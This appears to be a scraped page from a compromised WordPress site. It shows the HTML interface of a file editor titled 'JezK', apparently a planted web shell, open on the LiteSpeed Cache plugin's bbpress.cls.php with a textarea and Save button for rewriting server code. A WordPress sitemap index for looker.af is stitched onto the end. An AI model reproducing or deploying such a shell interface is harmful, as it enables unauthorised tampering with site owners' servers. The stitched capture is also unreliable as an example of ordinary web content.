
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: bbpress.cls.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * The Third Party integration with the bbPress plugin.
 *
 * @since		1.0.5
 */
namespace LiteSpeed\Thirdparty;

defined(&#039;WPINC&#039;) || exit();

use LiteSpeed\Router;

class BBPress
{
	/**
	 * Detect if bbPress is installed and if the page is a bbPress page.
	 *
	 * @since 1.0.5
	 * @access public
	 */
	public static function detect()
	{
		if (function_exists(&#039;is_bbpress&#039;)) {
			add_action(&#039;litespeed_api_purge_post&#039;, __CLASS__ . &#039;::on_purge&#039;); //todo
			if (apply_filters(&#039;litespeed_esi_status&#039;, false)) {
				// don&#039;t consider private cache yet (will do if any feedback)
				add_action(&#039;litespeed_control_finalize&#039;, __CLASS__ . &#039;::set_control&#039;);
			}
		}
	}

	/**
	 * This filter is used to let the cache know if a page is cacheable.
	 *
	 * @access public
	 * @since 1.2.0
	 */
	public static function set_control()
	{
		if (!apply_filters(&#039;litespeed_control_cacheable&#039;, false)) {
			return;
		}

		// set non ESI public
		if (is_bbpress() &amp;&amp; Router::is_logged_in()) {
			do_action(&#039;litespeed_control_set_nocache&#039;, &#039;bbpress nocache due to loggedin&#039;);
		}
	}

	/**
	 * When a bbPress page is purged, need to purge the forums list and
	 * any/all ancestor pages.
	 *
	 * @since 1.0.5
	 * @access public
	 * @param integer $post_id The post id of the page being purged.
	 */
	public static function on_purge($post_id)
	{
		if (!is_bbpress()) {
			if (!function_exists(&#039;bbp_is_forum&#039;) || !function_exists(&#039;bbp_is_topic&#039;) || !function_exists(&#039;bbp_is_reply&#039;)) {
				return;
			}
			if (!bbp_is_forum($post_id) &amp;&amp; !bbp_is_topic($post_id) &amp;&amp; !bbp_is_reply($post_id)) {
				return;
			}
		}

		// Need to purge base forums page, bbPress page was updated.
		do_action(&#039;litespeed_purge_posttype&#039;, bbp_get_forum_post_type());
		$ancestors = get_post_ancestors($post_id);

		// If there are ancestors, need to purge them as well.
		if (!empty($ancestors)) {
			foreach ($ancestors as $ancestor) {
				do_action(&#039;litespeed_purge_post&#039;, $ancestor);
			}
		}

		global $wp_widget_factory;
		if (bbp_is_reply($post_id) &amp;&amp; !is_null($wp_widget_factory-&gt;widgets[&#039;BBP_Replies_Widget&#039;])) {
			do_action(&#039;litespeed_purge_widget&#039;, $wp_widget_factory-&gt;widgets[&#039;BBP_Replies_Widget&#039;]-&gt;id);
		}
		if (bbp_is_topic($post_id) &amp;&amp; !is_null($wp_widget_factory-&gt;widgets[&#039;BBP_Topics_Widget&#039;])) {
			do_action(&#039;litespeed_purge_widget&#039;, $wp_widget_factory-&gt;widgets[&#039;BBP_Topics_Widget&#039;]-&gt;id);
		}
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
